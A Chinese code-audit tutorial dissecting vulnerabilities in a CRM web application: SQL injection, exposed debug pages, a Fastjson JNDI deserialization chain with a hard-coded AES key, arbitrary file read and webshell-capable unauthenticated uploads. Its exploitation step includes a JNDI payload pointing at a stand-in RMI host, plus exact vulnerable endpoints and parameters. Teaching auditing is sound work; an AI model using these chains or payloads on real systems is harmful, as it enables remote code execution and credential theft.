某CRM系统代码审计实战教学文档<\/strong><\/h2>
1. 信息收集与项目概览<\/strong><\/h3>
在开始代码审计之前，对目标项目进行基础信息收集是至关重要的第一步，这决定了后续审计的策略和方向。<\/p>

技术框架<\/strong>: 目标系统为非基于Maven构建的传统Java Web项目。虽然其代码结构在某些地方“形似”Struts2框架，但并非<\/strong>真正的Struts2项目，因此在审计时不应直接套用Struts2特有的漏洞模式（如S2系列漏洞）。<\/li>
路由机制<\/strong>: 系统的URL路由设计与项目的物理文件目录结构高度一致。这意味着前端访问的\/path\/to\/some.jsp<\/code>路径，通常对应着服务器上webapp<\/code>目录下的\/path\/to\/some.jsp<\/code>文件。这种设计使得通过URL推测后端代码位置变得相对容易。<\/li>
审计策略<\/strong>: 鉴于其非框架、无依赖管理的特性，传统的关键字全局搜索<\/strong>将成为最直接、最有效的漏洞挖掘手段。<\/li> <\/ul> 2. 核心鉴权机制分析<\/strong><\/h3> 在审计具体功能点前，必须首先理解系统的安全校验逻辑，以判断漏洞触发的前提条件（前台\/后台）。<\/p> 代码定位<\/strong>: 鉴权逻辑是审计的基石。通过分析，发现系统采用了一种简单的Session验证方式。<\/li> 核心代码<\/strong>: com.<\/span>metasoft<\/span>.<\/span>framework<\/span>.<\/span>pub<\/span>.<\/span>util<\/span>.<\/span>UserState<\/span> us =<\/span> com.<\/span>metasoft<\/span>.<\/span>framework<\/span>.<\/span>model<\/span>.<\/span>users<\/span>.<\/span>UserManager<\/span>.<\/span>getUserBySessionId<\/span>(<\/span>session.<\/span>getId<\/span>());<\/span> <\/span><\/span>if<\/span> (<\/span>us !=<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> ress =<\/span> us.<\/span>getRess<\/span>();<\/span> <\/span><\/span>}<\/span> else<\/span> {<\/span> <\/span><\/span> response.<\/span>sendRedirect<\/span>(<\/span>"\/index.jsp"<\/span>);<\/span> \/\/ 未登录则重定向到登录页 <\/span><\/span><\/span><\/span> return<\/span>;<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> 机制解读<\/strong>: 代码从当前Session中尝试获取用户信息对象(UserState<\/code>)。如果获取结果为null<\/code>，则直接中断当前请求并跳转至登录页面。<\/li> 审计应用<\/strong>: 这是一个全局性<\/strong>的鉴权方案。在审计任何JSP接口时，只需检查其开头是否包含此段代码或类似的Session验证逻辑。存在该代码<\/strong>: 漏洞为后台漏洞<\/strong>，需要有效的用户会话（Cookie）才能利用。<\/li> 不存在该代码<\/strong>: 漏洞为前台漏洞<\/strong>，无需登录即可利用，危害更大。<\/li> <\/ul> <\/li> <\/ul> 3. 漏洞详情分析与利用<\/strong><\/h3> 3.1. 前台SQL注入漏洞<\/strong><\/h4> 漏洞文件<\/strong>: \/si\/callcenter\/solarun\/mcc_login.jsp<\/code><\/li> 漏洞成因<\/strong>: 在该JSP文件中，用户输入的参数被直接拼接至SQL查询语句中，未经过任何过滤或预编译处理。<\/li> 危险方法<\/strong>: 使用了一个自定义的DBManager.getArray(String sql)<\/code>方法。<\/li> 代码分析<\/strong>: 跟进com.metasoft.framework.db.DBManager<\/code>类，可发现getArray<\/code>方法内部直接使用Statement.executeQuery(sql)<\/code>执行传入的SQL字符串，是典型的SQL注入漏洞sink点。<\/li> 利用条件<\/strong>: 根据该JSP文件是否包含鉴权代码来判断是前台还是后台注入。<\/li> <\/ul> 3.2. 前台敏感信息泄露漏洞<\/strong><\/h4> 漏洞文件<\/strong>: \/env.jsp<\/code>, \/debug.jsp<\/code><\/li> 漏洞成因<\/strong>: 这些页面通常用于显示系统环境信息、配置参数、调试日志等。在生产环境中，如果未被正确禁用或移除，攻击者直接访问即可获取大量敏感信息，如数据库连接池配置、服务器路径、系统变量等，为后续攻击提供情报。<\/li> <\/ul> 3.3. 前台Fastjson反序列化漏洞 & 后台任意文件读取 (组合利用)<\/strong><\/h4> 这是一个利用链较长的复杂漏洞，危害极大。<\/p> 入口文件<\/strong>: \/business\/common\/download.jsp<\/code><\/p> <\/li> 参数<\/strong>: p<\/code><\/p> <\/li> 触发流程<\/strong>:<\/p> 该JSP接收参数p<\/code>，并将其传递给com.metasoft.framework.pub.download.AnalyzeParam<\/code>类进行处理。<\/li> 在AnalyzeParam<\/code>中，参数p<\/code>的值会先被一个名为AesEcbCipher<\/code>的类进行AES解密<\/strong>。<\/li> 关键点<\/strong>: AES的密钥在代码中被硬编码<\/strong>，这意味着攻击者如果能够找到或逆向出该密钥，就可以自主构造加密后的恶意payload。<\/li> 解密后的数据被当作JSON字符串，并使用了JSON.parseObject(jsonStr, Object.class)<\/code>进行解析。此处的Fastjson版本存在反序列化漏洞，攻击者可以构造恶意JSON数据，利用JNDI注入等方式实现RCE。<\/li> <\/ol> <\/li> 利用步骤 (POC)<\/strong>:<\/p> 准备一个恶意的RMI服务（可使用工具如 jndi_tool<\/code>）。<\/li> 构造一条能触发JNDI注入的Fastjson payload，例如：{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi:\/\/your-rmi-server\/exploit", "autoCommit":true}<\/code><\/li> 使用硬编码的AES密钥，将上述JSON payload加密。<\/li> 将加密后的Hex字符串作为p<\/code>参数的值，发起请求：http:\/\/target\/business\/common\/download.jsp?p={加密后的payload}<\/code><\/li> 成功触发后，服务器会向指定的RMI服务发起请求并执行恶意代码。<\/li> <\/ol> <\/li> 组合漏洞: 任意文件读取<\/strong><\/p> 同一个download.jsp<\/code>接口，如果传入的p<\/code>参数解密后不是JSON格式，可能会走入其他分支逻辑，导致任意文件读取。<\/li> 利用此功能需要绝对路径<\/strong>。可通过之前发现的\/env.jsp<\/code>信息泄露漏洞获取路径信息，然后读取如\/env\/conf\/dbinfo.prop<\/code>等配置文件，直接获取数据库 credentials。<\/li> <\/ul> <\/li> <\/ul> 3.4. 多处任意文件上传漏洞<\/strong><\/h4> 该系统存在大量文件上传功能点，且多数校验不严。根据鉴权情况，分为前台和后台漏洞。<\/p> 通用漏洞成因<\/strong>:<\/p> 文件上传后，服务器端对文件后缀名未做任何有效的白名单过滤<\/strong>。<\/li> 文件保存路径和文件名虽经部分处理（如使用UUID重命名），但最终都是通过saveAs()<\/code>等方法直接拼接路径保存，存在风险。<\/li> <\/ol> <\/li> 漏洞文件列表<\/strong>:<\/p> 前台上传<\/strong> (无需登录): \/sendfile.jsp<\/code><\/li> \/sendsms.jsp<\/code> (注：原文此处标注需合法Cookie，可能存在歧义，需实际验证)<\/li> \/common\/jsp\/upload.jsp<\/code><\/li> \/mobile\/mobileupload.jsp<\/code><\/li> <\/ul> <\/li> 后台上传<\/strong> (需登录): \/common\/jsp\/upload2.jsp<\/code>: 此文件不仅有无校验上传功能，还包含一个文件删除功能（参数strType=delete<\/code>和titlevalue=文件路径<\/code>），进一步增加了安全隐患。<\/li> \/develop\/systparam\/softlogo\/upload.jsp<\/code><\/li> <\/ul> <\/li> <\/ul> <\/li> 保存路径分析<\/strong>: 以sendfile.jsp<\/code>使用的com.metasoft.framework.pub.util.Path.getUserFile()<\/code>为例，文件最终保存在\/userfile\/default\/temp\/[UUID].[原后缀]<\/code>。攻击者上传Webshell（如.jsp<\/code>）后，只需访问此路径即可触发。<\/p> <\/li> <\/ul> 4. 审计技巧总结<\/strong><\/h3> 关键词搜索<\/strong>: 这是审计此类项目最核心的方法。应搜索的关键字包括：<\/p> SQL<\/code>: Statement<\/code>, executeQuery<\/code>, getArray<\/code>, 拼接<\/code><\/li> 文件上传<\/strong>: upload<\/code>, saveAs<\/code>, File<\/code>, InputStream<\/code>, OutputStream<\/code><\/li> 文件读写<\/strong>: FileInputStream<\/code>, FileOutputStream<\/code>, read<\/code>, write<\/code>, delete<\/code><\/li> 反序列化<\/strong>: JSON.parse<\/code>, JSON.parseObject<\/code>, ObjectInputStream<\/code>, readObject<\/code><\/li> 执行命令<\/strong>: Runtime.exec<\/code>, ProcessBuilder<\/code>, start<\/code><\/li> 重定向<\/strong>: sendRedirect<\/code>, forward<\/code><\/li> <\/ul> <\/li> 鉴权判断<\/strong>: 每找到一个可疑sink点，第一时间<\/strong>检查文件首部的鉴权代码，明确漏洞利用条件，评估其实际危害等级。<\/p> <\/li> 数据流追踪<\/strong>: 对于像Fastjson漏洞这类需要参数传递和加解密的复杂漏洞，要学会在IDE中追溯参数的来源、传递过程和处理函数（如AnalyzeParam<\/code>和AesEcbCipher<\/code>），理清完整的利用链。<\/p> <\/li> 组合利用<\/strong>: 单个漏洞的利用可能受限（如需要绝对路径），但将多个漏洞组合起来（如信息泄露 + 文件读取<\/strong>、文件上传 + 文件删除<\/strong>）往往能达成更佳的攻击效果。<\/p> <\/li> <\/ol> 5. 结论<\/strong><\/h3> 该CRM系统是一个非常适合代码审计初学者入门的项目。其结构清晰，漏洞模式传统且典型，涵盖了SQL注入、敏感信息泄露、反序列化、文件上传\/读取\/删除等Web安全中常见的漏洞类型。通过本次审计实战，可以很好地训练快速定位漏洞、分析成因、追踪利用链、判断利用条件<\/strong>的综合能力。<\/p>